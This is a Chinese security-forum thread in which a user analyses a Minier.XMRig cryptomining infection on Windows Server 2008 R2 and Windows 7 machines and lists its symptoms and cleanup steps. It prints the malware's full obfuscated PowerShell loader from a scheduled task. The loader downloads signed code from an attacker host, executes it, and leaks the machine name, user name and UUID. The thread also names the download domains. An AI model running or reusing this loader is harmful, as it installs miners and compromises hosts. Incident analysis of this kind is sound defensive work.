搜索
查看: 1016|回复: 4
收起左侧

[分析报告] Windows 7 和Windows 2008中的挖矿病毒,Minier.XMRig

[复制链接]
fragranse
发表于 2020-12-14 10:07:13 | 显示全部楼层 |阅读模式
本帖最后由 fragranse 于 2020-12-14 10:10 编辑


刚刚编辑完毕,准备发出去,但是系统限制了帖子的大小,所以决定分开发吧。
发现是因为贴图太多的缘故,删除截图吧。

==============================

一台 Windows Server 2008 R2安装了 SEP 2014发现的病毒,但是其实是没有防住。
看名字应该是挖矿的?

分析了原理,应该是某台 Windows 7的电脑中毒之后,然后通过扫描发现其它 Windows 7 或者 Windows 2008 R2系统,进行攻击。
(Windows 10 和Windows Server 2012 以上均未受到攻击提示。)
遭受攻击的机器要么只装了 SEP,要么就未装SEP。
其它有安装360卫士的电脑均被拦截提醒。


这台Windows Server 2008 R2经过SEP查杀,但是无效果。
DNS会被修改为 8.8.8.8 9.9.9.9
cmd 文件和 powershell 文件也被篡改。
进程里面有大量的cmd 和powershell进程。
并发现木马下载网址:http://d.ackng.com


查看计划任务
1、有3个一样的计划任务,处于不同的位置,每小时定时启动:

执行的命令如下:
以powershell 运行,执行以下参数:
-w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?ipc_20201211?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))


2、有一个 “blackbal”的计划任务,但是执行命令已经找不到了。

3、有一个“lmbpqsk”的计划任务,每50分钟执行一次。
c:\windows\TEMP\lmbqsk.exe

暂时的解决办法是:
1、删除计划任务。
2、删除powershell和cmd的开机启动。

后期此机器肯定是下线不再使用了。

dsb2466
发表于 2020-12-14 10:51:20 | 显示全部楼层
WMI记得检查下,补丁记得修复下
cndaofeng
发表于 2020-12-14 22:06:51 | 显示全部楼层
这主要针对服务器的吧
Vincent888
发表于 2021-1-11 13:25:10 | 显示全部楼层
大佬,能否把分析文档给我一份,学习一下。1186744605@qq.com
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 晋ICP备20004298号-1 ) GMT+8, 2021-1-28 09:58 , Processed in 0.126804 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表